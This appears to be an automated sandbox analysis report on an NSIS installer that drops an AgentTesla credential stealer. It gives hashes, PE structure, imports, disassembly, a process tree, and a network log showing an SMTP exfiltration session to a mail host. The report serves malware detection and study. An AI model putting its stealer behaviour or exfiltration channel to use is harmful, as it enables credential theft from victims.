                                                        Preview:R.".z.......D....1.....f..%.J..,.L.M.@..-.....FU.h:..:....0.(H.TU%e...dhh.A....^F'...h.U......q+B....NY:...f..S. ...O..'I.7.5...|..T.R.WWI5Px....mVE..10VZ......9,._.H.A9@-.7..z.>..zg.K.2....c0...fM..?n....):Bipo..wsH.3#.(],........%.l..<..z.u"..T...<..,.....v...._f...._...v...@..]-....^.U.h...:...'..()...%...(".,..9k...2...@.s...F...V ..h.m...M.W.....8O...I.7i.v..G........HX,.o_.&...._...n..m..0.......}..2..4I....a.F.....N.,"$@s~0.....o.....`%<....(.h.bD.......Ma-s....D...<..z..{_.u...........H..1...._f..%.J..,.L.M.......H.U.h...:V..'..()...%....".,...W..FF\........^......Jy..h$m...M.W..eq.R..R$/I.7.;..C....6.\..X,.4_..F..._...V..m..0.......}..E..I....a.F.....N.,"$@s~0...QLc.]...`%<....(.2.bW.......Ma-s....D...<..z.u"..T...4.......H..1...._f..%.J..,.L.M.@..-.....FU.h:..:...'..()...%....".,..9....2...@....gF....V ..h$m...M.W...q..8O..'I.7i.v..G...y>.\.HX,.4_..F..._...n..m..0.......}..E..I....a.F.....N.,"$@s~0...QLc.]...`%<....(.2.bW...
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):95744
                                                        Entropy (8bit):6.226201646790148
                                                        Encrypted:false
                                                        SSDEEP:1536:+0ZlV4KXc4OxQEsGZDmS+jtBaK/eRuZocSZUpxwkyBp+NnFsSW81kxgsWJjcdvwk:Ld4KALsGZDN+x/yuZocSTkyBw9y8eASd
                                                        MD5:A22E128E1C66E8E76F2F05CA2D81A8F1
                                                        SHA1:589A59B124FACC5A045FA99B334E476415E57CA2
                                                        SHA-256:EE05F69606802B01D1FA5BB8BC43885F7F5F66C53893DE380F9026CD3AFAA79D
                                                        SHA-512:C646ED13AA87FC2345AAE5AC640CD6E3A4B46B780045C86F4A384F4AFFD7E9FD510D7F50ECF2AFBFB12F34734997077E4DC7DC46B1222A8EDE0D0D793F77468B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 42%
                                                        • Antivirus: Virustotal, Detection: 35%, Browse
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...s...s...s...8...y...8.......8...g......U......b......`...8...j...s...........r.......r...Richs...........PE..L...V..d...............!.....|......".............@.........................................................................|k.......................................^...............................]..@............................................text............................... ..`.rdata...f.......h..................@..@.data...l............l..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.932397161868976
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:316557
                                                        MD5:856572778608242656795bd15cc3683c
                                                        SHA1:ef79e01019b9518fa82e8dc628d416cd9ccd7817
                                                        SHA256:be316d90b0e5c1f88f32fa6dc7cf5b2c760c8ea63e7ddec3e2303cccf8ae25f9
                                                        SHA512:df6e4621f566ba7f067e44f87fec3b0f7350a45b71d8401e3c1eeae0c82b24594bdc54e68787e61fd53193afbc31a85c0f5c90accf606fddf0fa59f6b591f077
                                                        SSDEEP:6144:vYa6mUhRSVGVVj8vjpxMegWObBb3vztdsPTtH2vkcikg5JjzPw4312:vYYC0VGHWjpxTgDbBdebl2vkciksA
                                                        TLSH:B964122427E4C593C4E342317C3A9AE5A8F9FA2B1560E70F276033587935AA1E70E323
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                        Icon Hash:b2a88c96b2ca6a72
                                                        Entrypoint:0x403640
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:61259b55b8912888e90f516ca08dc514
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 000003F4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [ebp-14h], ebx
                                                        mov dword ptr [ebp-04h], 0040A230h
                                                        mov dword ptr [ebp-10h], ebx
                                                        call dword ptr [004080C8h]
                                                        mov esi, dword ptr [004080CCh]
                                                        lea eax, dword ptr [ebp-00000140h]
                                                        push eax
                                                        mov dword ptr [ebp-0000012Ch], ebx
                                                        mov dword ptr [ebp-2Ch], ebx
                                                        mov dword ptr [ebp-28h], ebx
                                                        mov dword ptr [ebp-00000140h], 0000011Ch
                                                        call esi
                                                        test eax, eax
                                                        jne 00007F413CC5844Ah
                                                        lea eax, dword ptr [ebp-00000140h]
                                                        mov dword ptr [ebp-00000140h], 00000114h
                                                        push eax
                                                        call esi
                                                        mov ax, word ptr [ebp-0000012Ch]
                                                        mov ecx, dword ptr [ebp-00000112h]
                                                        sub ax, 00000053h
                                                        add ecx, FFFFFFD0h
                                                        neg ax
                                                        sbb eax, eax
                                                        mov byte ptr [ebp-26h], 00000004h
                                                        not eax
                                                        and eax, ecx
                                                        mov word ptr [ebp-2Ch], ax
                                                        cmp dword ptr [ebp-0000013Ch], 0Ah
                                                        jnc 00007F413CC5841Ah
                                                        and word ptr [ebp-00000132h], 0000h
                                                        mov eax, dword ptr [ebp-00000134h]
                                                        movzx ecx, byte ptr [ebp-00000138h]
                                                        mov dword ptr [0042A318h], eax
                                                        xor eax, eax
                                                        mov ah, byte ptr [ebp-0000013Ch]
                                                        movzx eax, ax
                                                        or eax, ecx
                                                        xor ecx, ecx
                                                        mov ch, byte ptr [ebp-2Ch]
                                                        movzx ecx, cx
                                                        shl eax, 10h
                                                        or eax, ecx
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcd8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x3b0000xcd80xe00False0.4224330357142857data4.220947409031048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                        RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                        RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                        RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                        RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                        RT_VERSION0x3b7580x23cdataEnglishUnited States
                                                        RT_MANIFEST0x3b9980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                                                        DLLImport
                                                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 20, 2023 19:43:18.322552919 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:18.508263111 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:18.508500099 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.077830076 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.079662085 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.264877081 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.265360117 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.265678883 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.451806068 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.501507044 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.687264919 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.687323093 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.687382936 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.687422037 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.687428951 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.687489986 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.690313101 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.872652054 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:19.872816086 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:19.936322927 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:20.122263908 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:20.190968990 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:20.376351118 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:20.377393007 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:20.566237926 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:20.566880941 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:20.757528067 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:20.757951021 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:20.946297884 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:20.947021961 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:21.157416105 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:21.157855034 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:21.344383001 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:21.346679926 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:21.346805096 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:21.346874952 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:21.346931934 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:21.532103062 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:21.532279968 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:21.666341066 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:21.906209946 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:43:22.080671072 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:43:22.080802917 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:44:58.259578943 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:44:58.445679903 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:44:58.446547985 CET58749703208.91.199.224192.168.2.5
                                                        Mar 20, 2023 19:44:58.446655989 CET49703587192.168.2.5208.91.199.224
                                                        Mar 20, 2023 19:44:58.459429979 CET49703587192.168.2.5208.91.199.224
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 20, 2023 19:43:18.274879932 CET6189353192.168.2.58.8.8.8
                                                        Mar 20, 2023 19:43:18.297280073 CET53618938.8.8.8192.168.2.5
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 20, 2023 19:43:18.274879932 CET192.168.2.58.8.8.80x9af3Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 20, 2023 19:43:18.297280073 CET8.8.8.8192.168.2.50x9af3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                        Mar 20, 2023 19:43:18.297280073 CET8.8.8.8192.168.2.50x9af3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                        Mar 20, 2023 19:43:18.297280073 CET8.8.8.8192.168.2.50x9af3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                        Mar 20, 2023 19:43:18.297280073 CET8.8.8.8192.168.2.50x9af3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Mar 20, 2023 19:43:19.077830076 CET58749703208.91.199.224192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                        Mar 20, 2023 19:43:19.079662085 CET49703587192.168.2.5208.91.199.224EHLO 035347
                                                        Mar 20, 2023 19:43:19.265360117 CET58749703208.91.199.224192.168.2.5250-us2.outbound.mailhostbox.com
                                                        250-PIPELINING
                                                        250-SIZE 41648128
                                                        250-VRFY
                                                        250-ETRN
                                                        250-STARTTLS
                                                        250-AUTH PLAIN LOGIN
                                                        250-AUTH=PLAIN LOGIN
                                                        250-ENHANCEDSTATUSCODES
                                                        250-8BITMIME
                                                        250-DSN
                                                        250 CHUNKING
                                                        Mar 20, 2023 19:43:19.265678883 CET49703587192.168.2.5208.91.199.224STARTTLS
                                                        Mar 20, 2023 19:43:19.451806068 CET58749703208.91.199.224192.168.2.5220 2.0.0 Ready to start TLS

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:19:43:07
                                                        Start date:20/03/2023
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                        Imagebase:0x400000
                                                        File size:316557 bytes
                                                        MD5 hash:856572778608242656795BD15CC3683C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Target ID:1
                                                        Start time:19:43:08
                                                        Start date:20/03/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\zjlxnt.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte
                                                        Imagebase:0x400000
                                                        File size:95744 bytes
                                                        MD5 hash:A22E128E1C66E8E76F2F05CA2D81A8F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 42%, ReversingLabs
                                                        • Detection: 35%, Virustotal, Browse
                                                        Reputation:low

                                                        Target ID:2
                                                        Start time:19:43:08
                                                        Start date:20/03/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:3
                                                        Start time:19:43:09
                                                        Start date:20/03/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\zjlxnt.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\zjlxnt.exe
                                                        Imagebase:0x400000
                                                        File size:95744 bytes
                                                        MD5 hash:A22E128E1C66E8E76F2F05CA2D81A8F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:15.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:16.4%
                                                          Total number of Nodes:1385
                                                          Total number of Limit Nodes:25
                                                          execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 